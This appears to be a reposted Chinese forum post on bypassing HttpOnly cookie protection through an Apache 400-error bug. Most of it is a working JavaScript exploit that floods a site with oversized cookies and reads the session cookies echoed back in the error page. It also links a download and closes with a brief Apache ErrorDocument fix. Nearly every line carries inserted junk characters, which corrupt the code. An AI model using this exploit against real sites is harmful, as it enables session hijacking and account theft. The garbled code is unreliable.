很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
' R/ T+ ^" ^5 a4 E0 \4 q5 d* q0 K3 P4 s1 a
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:' b* `$ @1 x9 @% a2 ~) k2 j8 v/ w
, Q3 E `+ ~- ~0 ]
g8 N9 j/ y: @// http://www.exploit-db.com/exploits/18442/+ E+ | s {: a* B9 Q' t, w
function setCookies (good) {/ [! o. l. y- r3 ?
// Construct string for cookie value
; D: w% y* L7 J) u3 O; X) kvar str = "";
|7 e) q3 z- S& `' g6 {; x# bfor (var i=0; i< 819; i++) {, o1 G0 d6 p) T, t& ]) d
str += "x";1 T5 b0 i) ?2 ]2 }; x
}
% L7 F6 Q: D8 l) ], T: ~// Set cookies
0 ~ `8 u- [$ P: xfor (i = 0; i < 10; i++) {
3 \: e' C; {2 k. w8 s' u// Expire evil cookie3 @1 E' G: f+ i
if (good) {
& ` h8 W# g7 c: O' b* _& F8 ?var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
: K0 b$ F6 M/ c' \9 U6 o; N}
' {+ P; A. ~ O# j }; D/ `/ j// Set evil cookie4 Y. f1 c8 O6 P. V3 I
else {7 H6 k1 e* g" H! z. ]: P4 a
var cookie = "xss"+i+"="+str+";path=/";
7 B. ^* Y0 C2 q}
. a b& c* B6 K1 ?! V- e0 ]document.cookie = cookie;$ T+ y1 W- q% b5 t1 N4 \
}
. W- T# g) E4 ^( R$ h}, ]9 J$ x3 u7 I# v* B [) f
function makeRequest() {
) u8 z9 `1 g# t/ R( O* r1 vsetCookies();! e N" t, Y; e8 A2 U! l$ f
function parseCookies () {
) \' w" ]# R3 q6 Q' C$ C6 y; P% p4 ovar cookie_dict = {}; z5 y* p8 f6 ?5 `, x
// Only react on 400 status" X1 ?6 W8 o9 ^ u9 _' B
if (xhr.readyState === 4 && xhr.status === 400) {; w( ^/ l2 Y& \ \ p6 A- w
// Replace newlines and match <pre> content
B" L S/ N) p& O4 H- jvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);+ Z$ f6 j$ P5 H* C+ ?
if (content.length) {) r: y& Y Y/ Y& @& N+ K8 L
// Remove Cookie: prefix- n; F9 F! o) v* R* }
content = content[1].replace("Cookie: ", "");
2 E2 e3 G; k( z9 l3 ~var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
& _" w$ T" l9 v/ e// Add cookies to object. Q$ z0 `5 F; K; ]8 P9 O
for (var i=0; i<cookies.length; i++) {
c3 b- \ Q& \, ~/ Xvar s_c = cookies.split('=',2);) t2 N- @9 E! d8 R
cookie_dict[s_c[0]] = s_c[1];: Q9 O3 t: q! }
}
0 t4 s" T1 n% u" h- B}
# q W S+ t' {+ K- C// Unset malicious cookies
+ m% e( O! p6 }6 W6 A! r$ O# gsetCookies(true);& S$ J: T5 q# V9 H
alert(JSON.stringify(cookie_dict));
2 h% t' V0 `& W}& L) U$ G$ L* S0 _! t" ?7 S- G
}. T, M' d2 w( G _- D' m/ [+ i
// Make XHR request
$ @4 i P3 a# z% Y I% |1 P* rvar xhr = new XMLHttpRequest();: \$ i4 u, H* U# }+ ]5 C
xhr.onreadystatechange = parseCookies;
; o8 ] i: t k- d& {xhr.open("GET", "/", true);0 r" K- P5 f8 M3 z8 g; n! P
xhr.send(null);8 }3 S5 y) p+ v+ s
}
5 ~( t4 m n; P4 `- g( Y4 N! R/ xmakeRequest();
' u: T7 t" {' n) M+ m! O3 P4 p! Z7 |/ I1 Z7 o4 X/ U
你就能看见华丽丽的400错误包含着cookie信息。- s, [+ d4 L+ A' J5 b. ]/ s* r
/ u; D6 O: T2 a" [! a, T* \
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#3 `/ T* \* Z' L N- k3 E
) w ]! D( ^1 C [+ A- `
修复方案:1 ^3 s; T- W% l9 U* s7 ]
" k0 r; |% T5 b; `% fApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下! U$ Y) I1 t% N+ Y: j1 d& E7 I: k
# z% G2 M2 H" s6 y& r" }
In the event of a problem or error, Apachecan be configured to do one of four things,
! b0 l- q, [" I8 n: L1 ~0 n
6 j2 X8 Q2 E3 G# | g+ l4 p X1. output asimple hardcoded error message输出一个简单生硬的错误代码信息: r: R% {/ B2 N( m& d$ S
2. output acustomized message输出一段信息
# Q4 r, v- l8 M' T6 [: V3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 ' `' Y9 M" f1 P
4. redirect to an external URL to handle theproblem/error转向一个外部URL
8 v f2 ~( S- |/ x) W. |: f4 b5 R5 l7 W1 [7 o7 i, Z3 t" v
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
+ m% y Y4 {% x) t9 H4 W
7 _, {( E. W! q6 ]" IApache配置:
$ Z. ]/ T) k+ e/ \; C7 u
# T% y8 I* J0 R$ v- V% w* Y qErrorDocument400 " security test"
# {6 h' \: p# a+ f: Q4 B9 s8 X/ b& W
当然,升级apache到最新也可:)。2 y' S" }( q+ Y2 S5 a
7 K0 D/ x$ ?1 r4 J# M5 X) z- m
参考:http://httpd.apache.org/security/vulnerabilities_22.html
0 H6 U" H- w, U$ Q9 B0 R. B
! {- [6 @ l4 X4 b |